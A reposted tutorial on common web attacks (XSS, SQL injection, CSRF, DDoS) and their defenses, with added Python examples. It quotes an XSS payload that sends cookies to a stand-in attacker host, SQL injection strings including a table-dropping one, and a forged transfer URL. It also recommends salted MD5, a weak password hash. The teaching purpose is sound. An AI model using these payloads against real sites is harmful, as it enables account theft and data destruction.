Summary of several common web attack methods and their defenses

Source: Internet
Author: User
Tags: sql injection attack, csrf attack

This article briefly introduces several common attack methods and their defenses:
  • XSS (cross-site scripting)
  • CSRF (cross-site request forgery)
  • SQL injection
  • DDoS
Web Security Series Catalog
    • Summary of several common web attack methods and their defenses
    • Summary of several common security algorithms
XSS concept
    • The full name is cross-site scripting: an attacker embeds a malicious script in a web page.
Case
    • For example, I wrote a blog site and an attacker posted an article whose content is `<script>window.open("www.gongji.com?param="+document.cookie)</script>`. If I do not process his content and store it directly in the database, then the next time another user opens his article, the server reads it from the database and returns it to the client, the browser executes the script, and the user's cookie is sent to the attacker's server.
Why the attack succeeds
    • Data entered by the user becomes code: the `<script>` above is stored as an ordinary string, but that string acts as code once the browser renders it.
Prevention
    • Escape user-supplied data before it is rendered, for example `<` becomes `&lt;`.
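The blog case above, as an added Python example (not code from the original post): the attacker's article is stored as received and then rendered twice, once spliced in raw and once HTML-escaped on output. The in-memory `ARTICLES` dict is a constructed stand-in for the blog's database.

```python
import html

# Constructed sample: the attacker's article body from the page's example.
MALICIOUS_ARTICLE = '<script>window.open("www.gongji.com?param="+document.cookie)</script>'

ARTICLES: dict = {}  # constructed stand-in for the blog's article table


def store_article(article_id: int, body: str) -> None:
    """Stores the submitted text exactly as received, as the page's blog does."""
    ARTICLES[article_id] = body


def render_unescaped(article_id: int) -> str:
    """Vulnerable: the stored string is spliced into the HTML, so the browser runs it."""
    return f"<div class='article'>{ARTICLES[article_id]}</div>"


def render_escaped(article_id: int) -> str:
    """Escapes <, >, &, and quotes on output; the text is displayed instead of executed."""
    return f"<div class='article'>{html.escape(ARTICLES[article_id], quote=True)}</div>"


def has_script_element(rendered_html: str) -> bool:
    """Check used below: does the rendered output still contain a <script tag?"""
    return "<script" in rendered_html.lower()


if __name__ == "__main__":
    store_article(1, MALICIOUS_ARTICLE)
    print(render_unescaped(1))   # the script survives and would run in a reader's browser
    print(render_escaped(1))     # &lt;script&gt;... is shown as text
```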
SQL injection concept
    • An SQL command is disguised as a normal HTTP request parameter and passed to the server; the server executes the SQL command, and the database is attacked.
Case
    • `' or '1'='1`. This is the most common SQL injection. Suppose we enter the user name jiajun and the password `' or '1'='1`. The query originally meant to run is `select * from user where username='' and password=''`; after the parameters are spliced in, the SQL statement executed is `select * from user where username='jiajun' and password='' or '1'='1'`. Since `1=1` is true, validation is naturally skipped.
    • A more serious case: if the password entered is `';drop table user;--`, the SQL command becomes `select * from user where username='jiajun' and password='';drop table user;--'`, and this time the table is deleted outright.
Why the attack succeeds
    • The parameters are forged as SQL fragments; after the parameters are spliced into the statement, a destructive SQL statement is formed and the database is attacked.
Prevention
    • In Java we can use precompiled statements (PreparedStatement): even if a parameter contains forged SQL, on the server side that parameter is treated as plain characters and has no effect as an attack.
    • Many ORM frameworks already escape parameters.
    • Prepare for the worst: even if the database is "dragged off" (the database is leaked), passwords in the database should not be stored in clear text. You can hash the password with MD5, and to increase the cost of cracking, use a salt (the database stores the user name, the salt (random characters), and the MD5 ciphertext).
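The login case and the prevention points above, as an added Python example (not code from the original post). Python's `sqlite3` placeholders play the role of Java's PreparedStatement; the in-memory `user` table, the user `jiajun` and the password `s3cret` are constructed. The salted MD5 follows the page's suggestion; in practice a slow password hash would be chosen instead.

```python
import hashlib
import hmac
import os
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory user table holding the page's example user (clear-text column)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table user (username text, password text)")
    conn.execute("insert into user values (?, ?)", ("jiajun", "s3cret"))
    return conn


def login_spliced(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Vulnerable: the request parameters are spliced into the SQL text, as on the page."""
    sql = f"select * from user where username='{username}' and password='{password}'"
    return conn.execute(sql).fetchone() is not None


def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Safe: '?' placeholders send the values separately, so quotes in them are just characters."""
    sql = "select * from user where username=? and password=?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def hash_password(password: str, salt: str = "") -> tuple:
    """Salted MD5 as the page suggests: store (salt, MD5(salt + password)), never clear text."""
    salt = salt or os.urandom(8).hex()
    return salt, hashlib.md5((salt + password).encode()).hexdigest()


def verify_password(password: str, salt: str, stored_hash: str) -> bool:
    """Recomputes the salted hash and compares in constant time."""
    return hmac.compare_digest(hash_password(password, salt)[1], stored_hash)


if __name__ == "__main__":
    db = make_db()
    print(login_spliced(db, "jiajun", "' or '1'='1"))        # True: validation skipped
    print(login_parameterized(db, "jiajun", "' or '1'='1"))  # False: treated as a literal
```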
CSRF concept
    • The full name is cross-site request forgery: gaining access by masquerading as a trusted user. In plain language, I visit site A, so a cookie for A now exists in my browser; then I visit a rogue website and accidentally click a link on it (which sends a request to A), and the rogue website uses my identity to access A.
Case
    • This example may not exist in reality, but the attack works the same way. For example, I log in to a bank website, then visit a rogue website and click a link inside it pointing to `www.A.com/transfer?account=666&money=10000`; it is very likely that I have just transferred 10,000 RMB to the person with account 666.
    • Note that the attack does not depend on me clicking the link; it can also be a resource request on the rogue site that points at this transfer link, such as a
Why the attack succeeds
    • The user stores a cookie locally; the attacker relies on the user's cookie for authentication and forges requests as the user.
Prevention
    • The attack works because the attacker exploits the cookie stored in the browser for user authentication, so if we do not rely on the cookie alone for verification we can prevent it. We can use token authentication (the token is not stored in the browser).
    • Referer checking: the HTTP Referer is part of the request header. When the browser sends a request to the web server it usually carries the Referer, telling the server which page the link came from, and the server can use this information. With that check in place, the transfer can only be made from bank A's own pages.
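The two checks above applied to the page's transfer request, as an added Python example (not code from the original post). The session store, the host name `www.a.com` and the `handle_transfer` handler are constructed; the token is issued server-side and embedded in the bank's own form rather than in a cookie, so a rogue page cannot read or attach it.

```python
import hmac
import secrets
from urllib.parse import urlparse

SITE_HOST = "www.a.com"  # constructed: the bank site from the page's example

# Constructed server-side session store: session id -> CSRF token bound to that session.
SESSIONS: dict = {}


def new_session() -> tuple:
    """Logs a user in: returns (session id for the cookie, token for the bank's own form)."""
    sid, token = secrets.token_hex(16), secrets.token_hex(16)
    SESSIONS[sid] = token
    return sid, token


def referer_is_same_site(headers: dict) -> bool:
    """Referer check from the page: the request must originate from one of our own pages."""
    ref = headers.get("Referer")
    return ref is not None and urlparse(ref).hostname == SITE_HOST


def handle_transfer(cookies: dict, headers: dict, form: dict) -> str:
    """Performs /transfer only when the cookie, the Referer and the form token all line up."""
    token = SESSIONS.get(cookies.get("sid"))
    if token is None:
        return "401 not logged in"
    if not referer_is_same_site(headers):
        return "403 bad referer"
    # The rogue site never sees the token, so a forged request cannot supply it.
    if not hmac.compare_digest(token, form.get("csrf_token", "")):
        return "403 bad token"
    return f"200 transferred {form['money']} to {form['account']}"


if __name__ == "__main__":
    sid, token = new_session()
    own_page = {"Referer": "https://www.a.com/transfer"}
    print(handle_transfer({"sid": sid}, own_page, {"csrf_token": token, "account": "666", "money": "10000"}))
    print(handle_transfer({"sid": sid}, {"Referer": "https://rogue.example/"}, {"account": "666", "money": "10000"}))
```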
DDoS concept
    • Distributed denial of service: simply put, sending a large number of requests so that the server can no longer serve. DDoS attacks are built on DoS attacks. In popular terms, DoS is a one-on-one fight and DDoS is a gang fight: as technology developed, the destructive power of a single DoS attack declined, so DDoS appeared, in which the attacker unites a large number of computers on the public network to attack one or more targets.
Case
    • SYN flood. Briefly, in the TCP three-way handshake the client first sends a connection request, the server returns a message accepting it, and the client returns a final message, after which the connection is established. Now suppose an attacker forges an IP address and sends a connection request to the server. The server accepts and, following the handshake rules, responds with a message; but the IP is forged, so nobody receives the response, the second handshake fails and the third never completes. The server keeps waiting for the client's third message and retransmits the second handshake. If the attacker forges a large number of IP addresses and sends requests, the server maintains a very large half-open connection queue, consumes a large amount of resources, and is finally paralysed.
    • CC attack: an attack on the application-layer HTTP protocol that simulates normal users sending a large number of requests until the site refuses service.
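The half-open connection queue described in the SYN flood case, seen from the server: an added Python example (not code from the original post) that counts sockets stuck in SYN-RECV per peer. The input is a constructed sample in the shape of `ss -tan` output (an assumption about the format); many distinct peers each holding one half-open socket is the pattern spoofed SYNs leave behind.

```python
from collections import Counter

# Constructed sample in the shape of `ss -tan` output (assumed format; not from the page).
SAMPLE_SS_OUTPUT = """\
State     Recv-Q Send-Q Local Address:Port  Peer Address:Port
ESTAB     0      0      10.0.0.5:80         198.51.100.12:40212
ESTAB     0      0      10.0.0.5:80         198.51.100.30:40377
TIME-WAIT 0      0      10.0.0.5:80         198.51.100.12:40190
SYN-RECV  0      0      10.0.0.5:80         203.0.113.7:51234
SYN-RECV  0      0      10.0.0.5:80         203.0.113.8:51235
SYN-RECV  0      0      10.0.0.5:80         203.0.113.9:51236
SYN-RECV  0      0      10.0.0.5:80         203.0.113.10:51237
SYN-RECV  0      0      10.0.0.5:80         203.0.113.11:51238
SYN-RECV  0      0      10.0.0.5:80         203.0.113.12:51239
"""


def parse_states(text: str) -> list:
    """Returns (state, peer_ip) for each socket line, skipping the header row."""
    rows = []
    for line in text.splitlines()[1:]:
        parts = line.split()
        if len(parts) < 5:
            continue
        state, peer = parts[0], parts[4]
        rows.append((state, peer.rsplit(":", 1)[0]))  # strip the port
    return rows


def half_open_report(text: str, max_half_open: int = 3) -> dict:
    """Summarises half-open (SYN-RECV) sockets; flags a flood above max_half_open."""
    rows = parse_states(text)
    syn_recv = [peer for state, peer in rows if state == "SYN-RECV"]
    per_peer = Counter(syn_recv)
    return {
        "half_open": len(syn_recv),
        "established": sum(1 for state, _ in rows if state == "ESTAB"),
        "distinct_syn_peers": len(per_peer),
        "max_per_peer": max(per_peer.values(), default=0),  # 1 everywhere = spoofed sources
        "flood": len(syn_recv) > max_half_open,
    }


if __name__ == "__main__":
    print(half_open_report(SAMPLE_SS_OUTPUT))
```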
Why the attack succeeds
    • The server's bandwidth is insufficient to absorb the attacker's traffic.
Prevention
    • The most direct way is to increase bandwidth. But the attacker uses ordinary local computers, so his bandwidth costs little, while for the server bandwidth is very expensive.
    • Cloud service providers have their own complete DDoS solutions and can provide abundant bandwidth resources.
Summary
    • The four attack methods above are XSS (the key is the script: a malicious script is used to attack), CSRF (the key is authentication via the local cookie and forged requests), SQL injection (the key is forging parameters as SQL statements) and DDoS (the key is generating a large number of requests by some means until the server crashes).
    • An attacker succeeds partly because of what the user does and partly because the server is not well defended; since we cannot control the user's actions, we need to build server-side defenses.
    • There is no absolute security, only more security.

Transferred from: http://www.cnblogs.com/-new/p/7135814.html
